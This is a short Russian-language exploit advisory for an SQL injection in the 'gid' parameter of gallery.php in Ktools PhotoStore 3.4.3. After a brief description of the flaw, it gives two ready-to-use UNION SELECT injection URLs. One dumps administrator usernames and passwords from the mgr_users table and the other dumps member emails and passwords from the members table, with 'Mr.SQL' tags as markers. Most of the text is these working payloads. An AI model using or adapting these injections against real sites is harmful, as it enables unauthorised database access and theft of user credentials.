Программа: Ktools PhotoStore 3.4.3
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «gid» сценарием gallery.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
ExPlo!t For ADMIN INFO:
http://www.exampel.com/gallery.php?gid=-9696'+UnIoN+SelecT+1, concat(username,0x3c7c7c204d722e53514c207c7c3e,password), 3,4,5,6,7,8,9,10,1,12,13+from+mgr_users/*
Explo!T For Users INFO:
http://www.exampel.com/gallery.php?gid=-9696'+union+select+1, concat(email,'::Mr.SQL::',password),3,4,5,6,7,8,9,10,1,12,13+from+members/*
